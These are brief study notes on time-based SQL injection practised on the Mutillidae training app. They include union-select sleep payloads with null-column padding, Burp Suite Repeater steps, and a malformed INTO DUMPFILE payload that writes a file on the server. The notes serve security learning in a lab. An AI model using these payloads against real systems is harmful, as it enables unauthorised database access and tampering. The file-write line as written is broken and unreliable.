Use Mutillidae

SQL timing attack takes advantage of either making the database do a lot of work or going to sleep for a period of time.

We measure not what comes back but how long the response takes.

Sleep command is

' union select+sleep(5)+--+

BURPSUITE > RIGHT-CLICK > URL-encodes you type

BURPSUITE > RIGHT-CLICK > Send to Repeater > Click on Repeater tab > Click on the Go button to see the response from the server.

In a a union statement the datatype and the number of columns must add up. We can used null to pad the columns

' union select+null, sleep(5)+--+

# There are more columns in the database than our union statement is selecting.

' union select+null, null, null, sleep(5)+--+

' union select+null,1,null,null, INTO DUMPFILE "test.txt"--

results matching ""

    No results matching ""